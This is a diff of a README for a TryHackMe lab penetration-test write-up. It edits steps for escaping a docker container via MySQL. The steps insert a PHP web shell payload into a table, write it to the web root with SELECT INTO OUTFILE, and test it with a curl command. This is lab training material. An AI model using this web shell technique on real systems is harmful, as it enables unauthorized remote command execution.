austin-lai/External-Penetration-Testing-Holo-Corporate-Network-TryHackMe-Holo-Network/README.md

 Here is the reference --- [Generate Backdoor via SQL Injection](http://scx020c07c.blogspot.com/2012/09/generate-backdoor-via-sql-injection.html)

-Below is the actions we perform to escape current docker container and gain access to the host system.
+Below are the actions we perform to escape current docker container and gain access to the host system.

 - Create a table named "hacker" under the active database, in this case the active database is ` DashboardDB `, though we can also create our own database, however to ensure the access to the host system and being low-profile we going to use current active database.

 - Then we use "INSERT" statement to insert our php payload  --- ` <?php $cmd=$_GET[“cmd”];system($cmd);?> ` into the table just created.

-- Next, we use "SELECT" statement with "outfile" feature to dump the php payload to a file --- ` <?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php `
+- Next, we use "SELECT" statement with "outfile" feature to dump the php payload to a file --- ` SELECT <?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php `

 - Last, we use "curl" command to get the response of our php to ensure our php payload is working properly --- ` curl 192.168.100.1:8080/shell.php?cmd=whoami `.